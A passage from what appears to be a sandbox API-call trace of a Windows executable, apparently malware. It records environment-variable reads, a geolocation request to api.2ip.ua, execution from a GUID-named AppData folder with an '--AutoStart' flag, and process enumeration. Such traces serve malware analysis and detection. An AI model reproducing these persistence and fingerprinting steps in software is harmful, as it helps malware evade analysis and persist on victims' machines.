Size=0x4c) returned 0x641668 [0180.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0180.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x636a30 [0180.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x636a30, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0180.368] GetLastError () returned 0x0 [0180.368] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641668) returned 0x4c [0180.368] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641668, Size=0x50) returned 0x641668 [0180.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0180.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x12) returned 0x6415a8 [0180.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x6415a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0180.368] GetLastError () returned 0x0 [0180.368] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641668) returned 0x50 [0180.368] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641668, Size=0x54) returned 0x641668 [0180.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0180.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x6415c8 [0180.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x6415c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0180.368] GetLastError () returned 0x0 [0180.368] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641668) returned 0x54 [0180.368] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641668, Size=0x58) returned 0x641668 [0180.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0180.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1b) returned 0x63ed30 [0180.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x63ed30, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0180.368] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641668) returned 0x58 [0180.368] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641668, Size=0x5c) returned 0x641668 [0180.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0180.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x63a918 [0180.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x63a918, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0180.368] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641668) returned 0x5c [0180.368] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641668, Size=0x60) returned 0x641668 [0180.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0180.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x29) returned 0x63af90 [0180.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x63af90, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0180.369] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641668) returned 0x60 [0180.369] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641668, Size=0x64) returned 0x641668 [0180.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0180.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1e) returned 0x63ed58 [0180.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x63ed58, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0180.369] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641668) returned 0x64 [0180.369] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641668, Size=0x68) returned 0x641668 [0180.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0180.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x41) returned 0x636a80 [0180.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x636a80, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0180.369] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641668) returned 0x68 [0180.369] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641668, Size=0x6c) returned 0x641668 [0180.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0180.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x17) returned 0x6416e0 [0180.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x6416e0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0180.369] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641668) returned 0x6c [0180.369] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641668, Size=0x70) returned 0x641668 [0180.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0180.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x14) returned 0x641700 [0180.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x641700, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SESSIONNAME=Console", lpUsedDefaultChar=0x0) returned 20 [0180.369] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641668) returned 0x70 [0180.369] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641668, Size=0x74) returned 0x641720 [0180.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0180.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xf) returned 0x63e500 [0180.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x63e500, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0180.369] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641720) returned 0x74 [0180.369] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641720, Size=0x78) returned 0x641720 [0180.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0180.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x16) returned 0x641668 [0180.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x641668, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0180.369] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641720) returned 0x78 [0180.369] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641720, Size=0x7c) returned 0x641720 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0180.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2a) returned 0x63afc8 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x63afc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0180.370] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641720) returned 0x7c [0180.370] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641720, Size=0x80) returned 0x641720 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0180.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x29) returned 0x63b000 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x63b000, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0180.370] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641720) returned 0x80 [0180.370] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641720, Size=0x84) returned 0x641720 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0180.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x15) returned 0x641688 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x641688, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0180.370] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641720) returned 0x84 [0180.370] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641720, Size=0x88) returned 0x641720 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0180.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1e) returned 0x63ed80 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x63ed80, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0180.370] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641720) returned 0x88 [0180.370] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641720, Size=0x8c) returned 0x641720 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0180.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2a) returned 0x63b038 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x63b038, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0180.370] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641720) returned 0x8c [0180.370] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641720, Size=0x90) returned 0x641720 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0180.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x12) returned 0x6416a8 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x6416a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0180.370] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641720) returned 0x90 [0180.370] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641720, Size=0x94) returned 0x641720 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0180.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x6417c0 [0180.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x6417c0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0180.371] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641720) returned 0x94 [0180.371] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641720, Size=0x98) returned 0x641720 [0180.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0180.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x46) returned 0x636ad0 [0180.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x636ad0, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0180.371] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641720) returned 0x98 [0180.371] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641720, Size=0x9c) returned 0x6417e0 [0180.479] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640d30) returned 0x80 [0180.480] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640d30) returned 0x80 [0180.480] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640d30) returned 0x80 [0180.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8ec) returned 0x641888 [0180.538] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640d30) returned 0x80 [0180.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63e518 [0180.538] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640d30) returned 0x80 [0180.539] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640d30) returned 0x80 [0180.539] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640d30) returned 0x80 [0180.664] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640d30) returned 0x80 [0180.681] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0184.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6359a0 [0184.334] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0195.281] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18b6e8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18dee8 | out: lpBuffer=0x18b6e8*, lpdwNumberOfBytesRead=0x18dee8*=0x1d1) returned 1 [0195.284] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0195.286] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0195.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x64d3e0 [0195.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x33cfb28 [0195.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33cfb28 | out: hHeap=0x620000) returned 1 [0195.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64d3e0 | out: hHeap=0x620000) returned 1 [0195.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6359a0 | out: hHeap=0x620000) returned 1 [0195.305] GetCurrentProcess () returned 0xffffffff [0195.305] GetLastError () returned 0x2 [0195.305] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0195.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x678720 [0195.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8ec) returned 0x33e0fe0 [0195.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x67b190 [0195.324] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x67b190, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\ythgrfed.exe.exe")) returned 0x61 [0195.325] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac") returned 1 [0195.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x33e18d8 [0195.334] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe\" --AutoStart" [0195.334] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe\" --AutoStart", pNumArgs=0x18dfc8 | out: pNumArgs=0x18dfc8) returned 0x33e3eb8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe" [0195.335] lstrcpyW (in: lpString1=0x18ec58, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe" [0195.352] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe\" --AutoStart" [0195.352] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe\" --AutoStart", pNumArgs=0x18df64 | out: pNumArgs=0x18df64) returned 0x33e3eb8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe" [0195.352] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe") returned="YTHGRFED.EXE.exe" [0195.353] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77010000 [0195.354] GetProcAddress (hModule=0x77010000, lpProcName="EnumProcesses") returned 0x0 [0195.354] GetProcAddress (hModule=0x77010000, lpProcName="EnumProcessModules") returned 0x0 [0195.354] GetProcAddress (hModule=0x77010000, lpProcName="GetModuleBaseNameW") returned 0x0 [0195.354] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x751c0000 [0195.405] GetProcAddress (hModule=0x751c0000, lpProcName="EnumProcesses") returned 0x751c1544 [0195.405] GetProcAddress (hModule=0x751c0000, lpProcName="EnumProcessModules") returned 0x751c1408 [0195.406] GetProcAddress (hModule=0x751c0000, lpProcName="GetModuleBaseNameW") returned 0x751c152c [0195.406] EnumProcesses (in: lpidProcess=0x183760, cb=0xa000, lpcbNeeded=0x18df70 | out: lpidProcess=0x183760, lpcbNeeded=0x18df70) returned 1 [0195.412] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0195.412] CloseHandle (hObject=0x0) returned 0 [0195.412] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0195.412] CloseHandle (hObject=0x0) returned 0 [0195.412] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0195.412] CloseHandle (hObject=0x0) returned 0 [0195.412] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0195.412] CloseHandle (hObject=0x0) returned 0 [0195.412] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0195.412] CloseHandle (hObject=0x0) returned 0 [0195.412] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0195.412] CloseHandle (hObject=0x0) returned 0 [0195.413] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0195.413] CloseHandle (hObject=0x0) returned 0 [0195.413] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 